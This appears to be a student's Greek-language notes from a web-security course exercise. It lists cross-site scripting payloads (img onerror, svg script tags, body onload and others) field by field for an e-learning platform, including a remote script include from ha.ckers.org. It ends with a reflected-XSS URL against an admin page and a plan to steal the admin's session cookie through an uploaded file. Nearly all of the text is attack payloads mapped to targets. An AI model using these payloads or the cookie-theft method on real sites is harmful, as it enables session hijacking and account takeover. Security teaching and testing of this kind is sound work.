------------------------------------------------------------
Αλλαγή ονόματος
--><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> -->
--><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1)> -->
</br style=a:expression(alert())>
<body onLoad="alert('XSS');"
'">><marquee><h1>XSS</h1></marquee>
<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS
<iframe xmlns="#" src="javascript:alert(1)"></iframe>
<audio src=1 href=1 onerror="javascript:alert(1)"></audio>
<video src=1 href=1 onerror="javascript:alert(1)"></video>
<image src=1 href=1 onerror="javascript:alert(1)"></image>
<object src=1 href=1 onerror="javascript:alert(1)"></object>
<math href="javascript:javascript:alert(1)">CLICKME</math>  <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>
<? foo="><script>javascript:alert(1)</script>">
------------------------------------------------------------

------------------------------------------------------------
Αλλαγή Επιθέτου
<script\x20type="text/javascript">javascript:alert(1);</script>
<video src=1 href=1 onerror="javascript:alert(1)"></video>
<object src=1 href=1 onerror="javascript:alert(1)"></object>
<body oninput=javascript:alert(1)><input autofocus>
<math href="javascript:javascript:alert(1)">CLICKME</math>  <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>

------------------------------------------------------------
Spane alla mhn ta trexw!!:
<applet onError applet onError="javascript:javascript:alert(1)"></applet onError>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
------------------------------------------------------------

	
------------------------------------------------------------
Εγγραφή Εκπαιδευόμενου
στο ονομα/επίθετο:
--><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> -->
------------------------------------------------------------
Αλλαγή Προφίλ μου	
Email/ονομα/επώνυμο	
<svg xmlns="#"><script>alert(1)</script></svg>
------------------------------------------------------------	
Τηλεσυνεργασία:
<svg xmlns="#"><script>alert(1)</script></svg>
------------------------------------------------------------	
Εργασία:
Στα σχόλια
<svg xmlns="#"><script>alert(1)</script></svg>
------------------------------------------------------------	
Ξεχάσατε το συνθηματικό σας;
Ονομα Χρήστη:
TzeniPantazi<svg xmlns="#"><script>alert(1)</script></svg>
------------------------------------------------------------











----> Drunkadmin <----

-Δημιουργία μαθήματος
---> Τίτλος
	<svg xmlns="#"><script>alert(1)</script></svg>
---> Εκπαιδευτές
	<svg xmlns="#"><script>alert(1)</script></svg>	
---> Περιγραφή
	<svg xmlns="#"><script>alert(1)</script></svg>
---> Λέξεις Κλειδιά
	<svg xmlns="#"><script>alert(1)</script></svg>-->
	<body onLoad="alert('1');"
---> Συμπληρωματικά Στοιχεία
	<svg xmlns="#"><script>alert(1)</script></svg>

Προσθήκη ανακοίνωσης σε μάθημα
--->Τίτλος ανακοίνωσης
	<image src=1 href=1 onerror="javascript:alert(1)"></image>
--->Σώμα ανακοίνωσης
	<image src=1 href=1 onerror="javascript:alert(1)"></image>

Ανταλλαγή Αρχείων
--->Αποστολέας
	<image src=1 href=1 onerror="javascript:alert(1)"></image>
---> Περιγραφή αρχείου:
	<image src=1 href=1 onerror="javascript:alert(1)"></image>

Ατζέντα:
---> Προσθήκη ενός γεγονότος
	---> Τίτλος
		<svg xmlns="#"><script>alert(1)</script></svg>
	---> Λεπτομέρειες
		<svg xmlns="#"><script>alert(1)</script></svg>
		
Έγγραφα:
--->Δημιουργία καταλόγου
	---> Ονομα νέου καταλόγου
		<svg xmlns="#"><script>alert(1)</script></svg>
	---> Ανέβασμα αρχείου στον εξυπηρέτη
		<svg xmlns="#"><script>alert(1)</script></svg>
		
Ομάδες Χρηστών:
	---> Όνομα ομάδας χρηστών
		<svg xmlns="#"><script>alert(1)</script></svg>
	---> Περιγραφή
		<svg xmlns="#"><script>alert(1)</script></svg>

Σύνδεσμος:
	---> Αλλαγή Συνδέσμου
		---> Όνομα Συνδέσμου
			<image src=1 href=1 onerror="javascript:alert(2)"></image>
--------------------------------------------------------------------------------------------------------

THANOS:
http://the-intruders.csec.chatzi.org/modules/admin/change_user.php/"><script>alert(1)</script>
vriskw link tou arxeioy poy exw kanei upload kai to kalw me window.location.href="link" kai pairnei to cookie tou admin
